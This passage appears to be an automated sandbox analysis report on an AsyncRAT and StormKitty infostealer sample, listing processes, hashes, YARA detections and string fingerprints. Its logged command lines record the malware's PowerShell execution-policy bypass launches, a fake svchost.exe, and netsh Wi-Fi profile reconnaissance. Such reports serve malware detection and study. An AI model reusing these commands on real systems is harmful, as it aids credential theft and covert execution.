                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.2934826064.0000000007450000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000002.2930537569.0000000005B8E000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000002.2919350933.000000000339B000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000002.2917460428.0000000001452000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000002.2919350933.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000007.00000002.2919350933.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000002.2919350933.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: unknown
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                                  Antivirus matches:
                                                                  • Detection: 87%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  Target ID:8
                                                                  Start time:05:19:02
                                                                  Start date:28/06/2024
                                                                  Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                                  Imagebase:0x5e0000
                                                                  File size:48'640 bytes
                                                                  MD5 hash:6D13D147A209E3BE044035F0C03B7BDE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000008.00000002.1805730959.0000000005577000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000008.00000002.1804100868.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:12
                                                                  Start time:05:19:25
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"' & exit
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:13
                                                                  Start time:05:19:25
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:14
                                                                  Start time:05:19:25
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"'
                                                                  Imagebase:0x4b0000
                                                                  File size:433'152 bytes
                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:15
                                                                  Start time:05:19:25
                                                                  Start date:28/06/2024
                                                                  Path:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\udwnme.exe"
                                                                  Imagebase:0xad0000
                                                                  File size:179'200 bytes
                                                                  MD5 hash:DA34EA26DDFEDFD7966E8AEDF0BB93E6
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, Author: ditekSHen
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, Author: ditekSHen
                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: Joe Security
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: ditekSHen
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: ditekSHen
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: ditekSHen
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: ditekSHen
                                                                  • Rule: MALWARE_Win_StormKitty, Description: Detects StormKitty infostealer, Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Author: ditekSHen
                                                                  Antivirus matches:
                                                                  • Detection: 79%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  Target ID:16
                                                                  Start time:05:19:36
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:17
                                                                  Start time:05:19:36
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:18
                                                                  Start time:05:19:36
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\chcp.com
                                                                  Wow64 process (32bit):true
                                                                  Commandline:chcp 65001
                                                                  Imagebase:0x70000
                                                                  File size:12'800 bytes
                                                                  MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:19
                                                                  Start time:05:19:36
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:netsh wlan show profile
                                                                  Imagebase:0x1560000
                                                                  File size:82'432 bytes
                                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:20
                                                                  Start time:05:19:36
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:findstr All
                                                                  Imagebase:0x560000
                                                                  File size:29'696 bytes
                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:21
                                                                  Start time:05:19:36
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:22
                                                                  Start time:05:19:36
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:23
                                                                  Start time:05:19:36
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\chcp.com
                                                                  Wow64 process (32bit):true
                                                                  Commandline:chcp 65001
                                                                  Imagebase:0x70000
                                                                  File size:12'800 bytes
                                                                  MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:24
                                                                  Start time:05:19:37
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:netsh wlan show networks mode=bssid
                                                                  Imagebase:0x1560000
                                                                  File size:82'432 bytes
                                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:25
                                                                  Start time:05:19:38
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\luglzv.exe"' & exit
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:26
                                                                  Start time:05:19:38
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:27
                                                                  Start time:05:19:38
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\luglzv.exe"'
                                                                  Imagebase:0x4b0000
                                                                  File size:433'152 bytes
                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:28
                                                                  Start time:05:19:39
                                                                  Start date:28/06/2024
                                                                  Path:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\luglzv.exe"
                                                                  Imagebase:0x530000
                                                                  File size:179'200 bytes
                                                                  MD5 hash:FF895D93516828450E0C0DD0E467E1D0
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001C.00000002.2919353202.0000000002A22000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 0000001C.00000002.2919353202.0000000002A22000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 0000001C.00000002.2919353202.0000000002A2B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: Joe Security
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: ditekSHen
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: ditekSHen
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_References_VPN, Description: Detects executables referencing many VPN software clients. Observed in infosteslers, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: ditekSHen
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: ditekSHen
                                                                  • Rule: MALWARE_Win_StormKitty, Description: Detects StormKitty infostealer, Source: C:\Users\user\AppData\Local\Temp\luglzv.exe, Author: ditekSHen
                                                                  Has exited:false

                                                                  Target ID:29
                                                                  Start time:05:19:50
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:30
                                                                  Start time:05:19:50
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:31
                                                                  Start time:05:19:50
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\chcp.com
                                                                  Wow64 process (32bit):true
                                                                  Commandline:chcp 65001
                                                                  Imagebase:0x70000
                                                                  File size:12'800 bytes
                                                                  MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:32
                                                                  Start time:05:19:50
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:netsh wlan show profile
                                                                  Imagebase:0x7ff726ad0000
                                                                  File size:82'432 bytes
                                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:33
                                                                  Start time:05:19:50
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:findstr All
                                                                  Imagebase:0x560000
                                                                  File size:29'696 bytes
                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:34
                                                                  Start time:05:19:50
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:35
                                                                  Start time:05:19:50
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:36
                                                                  Start time:05:19:50
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\chcp.com
                                                                  Wow64 process (32bit):true
                                                                  Commandline:chcp 65001
                                                                  Imagebase:0x70000
                                                                  File size:12'800 bytes
                                                                  MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:37
                                                                  Start time:05:19:50
                                                                  Start date:28/06/2024
                                                                  Path:C:\Windows\SysWOW64\netsh.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:netsh wlan show networks mode=bssid
                                                                  Imagebase:0x1560000
                                                                  File size:82'432 bytes
                                                                  MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1725619260.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fe0000_zrrHgsDzgS.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (jq$Tefq$dp
                                                                    • API String ID: 0-640866979
                                                                    • Opcode ID: c593148c00e44e51c7237bc4ce481777f03a75f1e152b19b62e0e02867246566
                                                                    • Instruction ID: 3c8d6dd0d994307233851d8c989175fd4d278a5fe2424c8503e5e0c1e4926f62
                                                                    • Opcode Fuzzy Hash: c593148c00e44e51c7237bc4ce481777f03a75f1e152b19b62e0e02867246566
                                                                    • Instruction Fuzzy Hash: 0F51AD30B101448FCB44DF6AC858A5EBBF6FF89710F2580A9E906DB3A6CA75DC01CB91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1725619260.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fe0000_zrrHgsDzgS.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Hjq$dLlq
                                                                    • API String ID: 0-3820807802
                                                                    • Opcode ID: 7a9f3c9a8a7f2252df19c00ce4a6f527b5c3791df9b388c1a5fa91fc51cbcbbf
                                                                    • Instruction ID: c5336c69420c89a25bebc0191900af884a1a126f3f4600cdc1e5ea5da18cc8bd
                                                                    • Opcode Fuzzy Hash: 7a9f3c9a8a7f2252df19c00ce4a6f527b5c3791df9b388c1a5fa91fc51cbcbbf
                                                                    • Instruction Fuzzy Hash: DD51D131B042448FCB15DF69C848B9EBBF6AF89300F1485A9E506DB3A2CE759C45DB90
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1725619260.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fe0000_zrrHgsDzgS.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: LRfq
                                                                    • API String ID: 0-2333822924
                                                                    • Opcode ID: 1773b3590e8897a1c3ba1493c7b46c934b688156602ea50bdbb7357c50927577
                                                                    • Instruction ID: 864bf6f6dd77b76c3255760146e6b1a848c563f3e7a734fb95682340b84ef1f2
                                                                    • Opcode Fuzzy Hash: 1773b3590e8897a1c3ba1493c7b46c934b688156602ea50bdbb7357c50927577
                                                                    • Instruction Fuzzy Hash: B0310534F002568FCB049BBDC451A6EBBB6FFC9310B104169E556DB3A9DE308C01D790
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1725619260.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fe0000_zrrHgsDzgS.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: dLlq
                                                                    • API String ID: 0-46837485
                                                                    • Opcode ID: 8a9460cdbdc41d6fb25f9a6bc559dd3021fba90909cd21d1e9beb39b74ec9a5a
                                                                    • Instruction ID: 73126f41351e845a190fe10fd8f4601375e0224cff66be8571f51df1dfb6612c
                                                                    • Opcode Fuzzy Hash: 8a9460cdbdc41d6fb25f9a6bc559dd3021fba90909cd21d1e9beb39b74ec9a5a
                                                                    • Instruction Fuzzy Hash: 5A317075A002058FDB14DFA9C448BAEBBF6FF89300F148569E405AB3A1CBB5ED44DB91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1725619260.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fe0000_zrrHgsDzgS.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Hjq
                                                                    • API String ID: 0-3368716452
                                                                    • Opcode ID: a62a5d46f7f63bf53277c23e84f2d7434ab5b5ac0c43666ed6b436b0918daf81
                                                                    • Instruction ID: b9931eaeb3efda869931f953bb7ac3bb5ad39af793dab5518e6b100b6a4b51b3
